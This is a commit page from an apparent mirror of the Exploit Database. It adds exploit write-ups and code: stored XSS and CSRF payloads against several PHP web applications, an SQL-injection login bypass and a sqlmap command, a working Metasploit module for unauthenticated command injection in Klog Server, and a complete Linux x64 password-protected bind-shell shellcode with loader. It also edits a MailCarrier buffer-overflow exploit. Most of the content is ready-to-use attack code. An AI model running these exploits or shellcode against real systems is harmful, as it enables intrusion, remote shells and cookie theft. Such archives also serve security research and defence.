bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-01-26

Browse source 
8 changes to exploits/shellcodes

MyBB Timeline Plugin 1.0 - Cross-Site Scripting / CSRF
Collabtive 3.1 - 'address' Persistent Cross-Site Scripting
CASAP Automated Enrollment System 1.0 - 'First Name' Stored XSS
CASAP Automated Enrollment System 1.0 - 'route' Stored XSS
Library System 1.0 - 'category' SQL Injection
Klog Server 2.4.1 - Unauthenticated Command Injection (Metasploit)

Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes)
This commit is contained in:
Offensive Security 2021-01-26 05:01:58 +00:00
parent 3e80d07fdb
commit 3fa3a8be65
10 changed files with 422 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

29
exploits/php/webapps/49467.txt Normal file
View file

@ -0,0 +1,29 @@
# Exploit Title: MyBB Timeline Plugin 1.0 - Cross-Site Scripting / CSRF
# Date: 1/21/2021
# Author: 0xB9
# Software Link: https://community.mybb.com/mods.php?action=view&pid=1428
# Version: 1.0
# Tested on: Windows 10
1. Description:
MyBB Timeline replaces the default MyBB user profile. This introduces cross-site scripting on user profiles & a CSRF that allows for the users timeline banner/image to be changed.
2. Proof of Concept:
~ XSS via Thread/Post ~
- Make a new thread or reply to an existing thread
- Input a payload in either the thread title or main post itself <script>alert('XSS')</script>
Payload will execute when visiting your profile.
~ XSS via Location/Bio ~
- Go to User CP -> Edit Profile
- Input a payload in the Location/Bio <script>alert('XSS')</script>
Payload will execute when visiting your profile.
~ CSRF ~
<form class="coverpicForm" action="http://localhost/mybb/timeline.php?action=profile&uid=1" style="display: block;">
<input type="text" name="coverpic" placeholder="Add Image URL" required="">
<input type="hidden" name="do_coverpic" value="change">
<input type="submit" value="Change">
</form>

113
exploits/php/webapps/49468.txt Normal file
View file

@ -0,0 +1,113 @@
# Exploit Title: Collabtive 3.1 - 'address' Persistent Cross-Site Scripting
# Date: 2021-01-23
# Exploit Author: Deha Berkin Bir
# Vendor Homepage: https://collabtive.o-dyn.de/
# Version: 3.1
# Tested on: Windows & XAMPP
==> Tutorial <==
1- Login to your account.
2- Go to the profile edit page and write your XSS/HTML payload into "Address" section.
- You will see the executed HTML payload at there. (HTML Injection)
- You will see the executed XSS payload at profile edit section. (XSS)
==> Executed Payloads <==
XSS Payload ==> " onfocus="alert(1)" autofocus="
HTML Payload ==> <h1>DehaBerkinBir</h1>
==> HTTP Request <==
POST /manageuser.php?action=edit HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://(HOST)/manageuser.php?action=editform&id=1
Content-Type: multipart/form-data; boundary=---------------------------12097618915709137911841560297
Content-Length: 2327
Connection: close
Cookie: activeSlideIndex=0; PHPSESSID=oj123o7asdfasdfu4pts2g
Upgrade-Insecure-Requests: 1
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="name"
admin
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="userfile"; filename=""
Content-Type: application/octet-stream
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="file-avatar"
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="company"
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="email"
dehaberkinbir@hotmail.com
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="web"
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="tel1"
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="tel2"
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="address1"
" onfocus="alert(1)" autofocus="
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="zip"
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="address2"
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="country"
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="state"
admin
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="gender"
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="locale"
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="admin"
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="oldpass"
admin
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="newpass"
-----------------------------12097618915709137911841560297
Content-Disposition: form-data; name="repeatpass"
-----------------------------12097618915709137911841560297--

17
exploits/php/webapps/49469.txt Normal file
View file

@ -0,0 +1,17 @@
# Exploit Title: CASAP Automated Enrollment System 1.0 - 'First Name' Stored XSS
# Exploit Author: Anita Gaud
# Vendor Homepage: https://www.sourcecodester.com/php/12210/casap-automated-enrollment-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12210&title=CASAP+Automated+Enrollment+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1
# Tested on Windows
*XSS IMPACT:*
1: Steal the cookie
2: User redirection to a malicious website
Vulnerable Parameters: First Name
*Steps to reproduce:*
1: Log in with a valid username and password. Navigate to the Users tab (http://localhost/Final/Final/users.php) on the left-hand side.
2: Add the new user and then add the payload <script>alert(document.cookie)</script>in First Name parameter and click on save button. Post Saved successfully.
3: Now, XSS will get stored and trigger every time and the attacker can steal authenticated users' cookies.

29
exploits/php/webapps/49470.txt Normal file
View file

@ -0,0 +1,29 @@
# Exploit Title: CASAP Automated Enrollment System 1.0 - 'route' Stored XSS
# Exploit Author: Richard Jones
# Date: 2021-01/23
# Vendor Homepage: https://www.sourcecodester.com/php/12210/casap-automated-enrollment-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12210&title=CASAP+Automated+Enrollment+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
# Steps to reproduce
# 1. login bypass username: admin, password: `' or 1=1#
# 2. Studants > Edit > "ROUTE" field enter.. "<script>alert(document.cookie)</script>
# Save, reload page, exploited stored XXS
POST /Final/update_student.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 297
Origin: http://TARGET
Connection: close
Referer: http://TARGET/Final/edit_stud.php?id=6
Cookie: PHPSESSID=97qoeda9h6djjis5gbr00p7ndc
student_id=6&status=half&fname=Ronel&mname=G.&lname=Ortega&gender=Male&dob=1999-06-16&address=Prk.1+brgy.banago+bacolod+city&student_class=ICT+-+Computer+Programming&transport=yes&route=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&gfname=Juanita&gmname=S.&glname=a&rship=Mother&tel=0912312445

13
exploits/php/webapps/49471.txt Normal file
View file

@ -0,0 +1,13 @@
# Exploit Title: Library System 1.0 - 'category' SQL Injection
# Exploit Author: Aitor Herrero
# Date: 2021-01-22
# Vendor Homepage: https://www.sourcecodester.com/php/12275/library-system-using-php.html
# Software Link: https://www.sourcecodester.com/php/12275/library-system-using-php.html
# Version: 1.0
# Tested On: Windows 10 + XAMPP 7.4.4
# Description: Library System 1.0
#STEP 1 : Go to the principal main
#STEP 2 : Choose a category example :http://localhost:8080/libsystem/libsystem/index.php?category=3
#STEP 3: Run your sqlmap example:
sqlmap -u "http://localhost:8080/libsystem/libsystem/index.php?category=3" --dbs

104
exploits/php/webapps/49474.rb Executable file
View file

@ -0,0 +1,104 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info={})
super(update_info(info,
'Name' => 'Klog Server Unauthenticated Command Injection Vulnerability',
'Description' => %q{
This module exploits an unauthenticated command injection vulnerability in Klog Server <= 2.4.1.
"user" parameter is executed via shell_exec() function without input validation.
},
'License' => MSF_LICENSE,
'Author' =>
[ 'B3KC4T', # Vulnerability discovery
'Metin Yunus Kandemir', # Metasploit module
],
'References' =>
[
['CVE', '2020-35729'],
['URL', 'https://docs.unsafe-inline.com/0day/klog-server-unauthentication-command-injection']
],
'DefaultOptions' =>
{
'HttpClientTimeout' => 2,
},
'Platform' => [ 'unix', 'linux' ],
'Arch' => [ ARCH_X64 ],
'Targets' => [
['Klog Server 2.4.1 (x64)', {
'Platform' => 'linux',
'Arch' => ARCH_X64,
}],
],
'Privileged' => false,
'DisclosureDate' => "2021-01-05",
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('TARGETURI', [true, 'The base path of the Klog Server', '/']),
]
)
end
def filter_bad_chars(cmd)
cmd.gsub!(/chmod \+x/, 'chmod 777')
cmd.gsub!(/;/, " %0A ")
cmd.gsub!(/ /, '+')
cmd.gsub!(/\//, '%2F')
end
def execute_command(cmd, opts = {})
command_payload = "unsafe+%22%26+#{filter_bad_chars(cmd)}%26%22"
print_status("Sending stager payload...")
uri = target_uri.path
res= send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'actions', 'authenticate.php'),
'encode_params' => false,
'vars_post' => {
'user' => command_payload,
'pswd' => "inline"
}
})
if res && res.code == 302
print_error("The target is not vulnerable!")
else
print_good("The target is vulnerable!")
end
end
def check
uri = target_uri.path
res= send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'actions', 'authenticate.php'),
'encode_params' => false,
'vars_post' => {
'user' => "unsafe+%22%26sleep+40%26%22", #checking blind command injection via sleep
'pswd' => "inline"
}
})
if res && res.code == 302
return Exploit::CheckCode::Safe
else
return Exploit::CheckCode::Vulnerable
end
end
def exploit
print_status("Exploiting...")
execute_cmdstager(flavor: :wget, delay: 10)
end
end

5
exploits/windows/remote/47554.py
View file

@ -48,11 +48,12 @@ buf += "\x32\xb4\xfe\x5c"
jmpesp = '\x23\x49\xA1\x0F'
# buffer length depends on length of source ip address, 5095 works for xxx.xxx.xx.x, you may need to tweak the length up or down
#buffer = '\x41' * 5093 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
#buffer = '\x41' * 5093 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
#buffer = '\x41' * 5094 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
buffer = '\x41' * 5095 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
#buffer = '\x41' * 5096 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
#buffer = '\x41' * 5097 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
#buffer = '\x41' * 5099 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
print "[*] MailCarrier 2.51 POP3 Buffer Overflow in USER command\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

6
files_exploits.csv
View file

@ -43663,3 +43663,9 @@ id,file,description,date,author,type,platform,port
49463,exploits/php/webapps/49463.py,"CASAP Automated Enrollment System 1.0 - Authentication Bypass",2021-01-22,"Himanshu Shukla",webapps,php,
49464,exploits/multiple/webapps/49464.py,"ERPNext 12.14.0 - SQL Injection (Authenticated)",2021-01-22,Hodorsec,webapps,multiple,
49465,exploits/multiple/webapps/49465.py,"Atlassian Confluence Widget Connector Macro - SSTI",2021-01-22,46o60,webapps,multiple,
49467,exploits/php/webapps/49467.txt,"MyBB Timeline Plugin 1.0 - Cross-Site Scripting / CSRF",2021-01-25,0xB9,webapps,php,
49468,exploits/php/webapps/49468.txt,"Collabtive 3.1 - 'address' Persistent Cross-Site Scripting",2021-01-25,"Deha Berkin Bir",webapps,php,
49469,exploits/php/webapps/49469.txt,"CASAP Automated Enrollment System 1.0 - 'First Name' Stored XSS",2021-01-25,"Anita Gaud",webapps,php,
49470,exploits/php/webapps/49470.txt,"CASAP Automated Enrollment System 1.0 - 'route' Stored XSS",2021-01-25,"Richard Jones",webapps,php,
49471,exploits/php/webapps/49471.txt,"Library System 1.0 - 'category' SQL Injection",2021-01-25,"Aitor Herrero",webapps,php,
49474,exploits/php/webapps/49474.rb,"Klog Server 2.4.1 - Unauthenticated Command Injection (Metasploit)",2021-01-25,"Metin Yunus Kandemir",webapps,php,

Can't render this file because it is too large.

1
files_shellcodes.csv
View file

@ -1029,3 +1029,4 @@ id,file,description,date,author,type,platform
48718,shellcodes/windows_x86/48718.c,"Windows/x86 - Download File (http://192.168.43.192:8080/9MKWaRO.hta) Via mshta Shellcode (100 bytes)",2020-07-26,"Siddharth Sharma",shellcode,windows_x86
49416,shellcodes/linux/49416.txt,"Linux/x86 - Bind (0.0.0.0:13377/TCP) Shell (/bin/sh) Shellcode (65 bytes)",2021-01-12,ac3,shellcode,linux
49466,shellcodes/windows_x86/49466.asm,"Windows/x86 - Download File (http://10.10.10.5:8080/2NWyfQ9T.hta) Via mshta + Execute + Stager Shellcode (143 bytes)",2021-01-22,"Armando Huesca Prida",shellcode,windows_x86
49472,shellcodes/linux/49472.c,"Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes)",2021-01-25,"Guillem Alminyana",shellcode,linux

1 id file description date author type platform
1029 48718 shellcodes/windows_x86/48718.c Windows/x86 - Download File (http://192.168.43.192:8080/9MKWaRO.hta) Via mshta Shellcode (100 bytes) 2020-07-26 Siddharth Sharma shellcode windows_x86
1030 49416 shellcodes/linux/49416.txt Linux/x86 - Bind (0.0.0.0:13377/TCP) Shell (/bin/sh) Shellcode (65 bytes) 2021-01-12 ac3 shellcode linux
1031 49466 shellcodes/windows_x86/49466.asm Windows/x86 - Download File (http://10.10.10.5:8080/2NWyfQ9T.hta) Via mshta + Execute + Stager Shellcode (143 bytes) 2021-01-22 Armando Huesca Prida shellcode windows_x86
1032 49472 shellcodes/linux/49472.c Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes) 2021-01-25 Guillem Alminyana shellcode linux

107
shellcodes/linux/49472.c Normal file
View file

@ -0,0 +1,107 @@
/*
Exploit Title: Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes)
Author: Guillem Alminyana
Date: 2021-01-18
Platform: GNU Linux x64
=====================================
Compile:
gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
*/
#include <stdio.h>
#include <string.h>
unsigned char code[]= \
"\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x48\x31\xd2\x0f\x05\x50\x5f\x52\x52\x66\x68"
"\x11\x5c\x66\x6a\x02\x6a\x31\x58\x54\x5e\xb2\x10\x0f\x05\x6a\x32\x58\x6a\x02\x5e"
"\x0f\x05\x6a\x2b\x58\x48\x31\xf6\x99\x0f\x05\x50\x5f\x6a\x02\x5e\x6a\x21\x58\x0f"
"\x05\x48\xff\xce\x79\xf6\x6a\x01\x58\x49\xb9\x50\x61\x73\x73\x77\x64\x3a\x20\x41"
"\x51\x48\x89\xe6\x6a\x08\x5a\x0f\x05\x48\x31\xc0\x48\x83\xc6\x08\x0f\x05\x48\xb8"
"\x31\x32\x33\x34\x35\x36\x37\x38\x56\x5f\x48\xaf\x75\x1c\x48\x31\xc0\x50\x48\xbb"
"\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\x50\x54\x5a\x57\x54\x5e\x6a\x3b\x58"
"\x0f\x05";
void main()
{
printf("ShellCode Lenght: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
/*
ASM
0: 6a 29 push 0x29
2: 58 pop rax
3: 6a 02 push 0x2
5: 5f pop rdi
6: 6a 01 push 0x1
8: 5e pop rsi
9: 48 31 d2 xor rdx,rdx
c: 0f 05 syscall
e: 50 push rax
f: 5f pop rdi
10: 52 push rdx
11: 52 push rdx
12: 66 68 11 5c pushw 0x5c11
16: 66 6a 02 pushw 0x2
19: 6a 31 push 0x31
1b: 58 pop rax
1c: 54 push rsp
1d: 5e pop rsi
1e: b2 10 mov dl,0x10
20: 0f 05 syscall
22: 6a 32 push 0x32
24: 58 pop rax
25: 6a 02 push 0x2
27: 5e pop rsi
28: 0f 05 syscall
2a: 6a 2b push 0x2b
2c: 58 pop rax
2d: 48 31 f6 xor rsi,rsi
30: 99 cdq
31: 0f 05 syscall
33: 50 push rax
34: 5f pop rdi
35: 6a 02 push 0x2
37: 5e pop rsi
38: 6a 21 push 0x21
3a: 58 pop rax
3b: 0f 05 syscall
3d: 48 ff ce dec rsi
40: 79 f6 jns 38 <loop_1>
42: 6a 01 push 0x1
44: 58 pop rax
45: 49 b9 50 61 73 73 77 movabs r9,0x203a647773736150
4c: 64 3a 20
4f: 41 51 push r9
51: 48 89 e6 mov rsi,rsp
54: 6a 08 push 0x8
56: 5a pop rdx
57: 0f 05 syscall
59: 48 31 c0 xor rax,rax
5c: 48 83 c6 08 add rsi,0x8
60: 0f 05 syscall
62: 48 b8 31 32 33 34 35 movabs rax,0x3837363534333231
69: 36 37 38
6c: 56 push rsi
6d: 5f pop rdi
6e: 48 af scas rax,QWORD PTR es:[rdi]
70: 75 1c jne 8e <exit_program>
72: 48 31 c0 xor rax,rax
75: 50 push rax
76: 48 bb 2f 62 69 6e 2f movabs rbx,0x68732f2f6e69622f
7d: 2f 73 68
80: 53 push rbx
81: 54 push rsp
82: 5f pop rdi
83: 50 push rax
84: 54 push rsp
85: 5a pop rdx
86: 57 push rdi
87: 54 push rsp
88: 5e pop rsi
89: 6a 3b push 0x3b
8b: 58 pop rax
8c: 0f 05 syscall
*/